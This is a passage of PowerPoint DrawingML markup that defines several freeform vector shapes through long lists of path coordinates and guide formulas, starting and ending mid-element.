                      <a:pt x="899" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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5145" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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5" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>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5146" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 33"/>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37"/>
                  <a:gd name="T41" fmla="*/ 33 w 33"/>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37">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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5147" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 0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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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 h="115">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11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5148" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
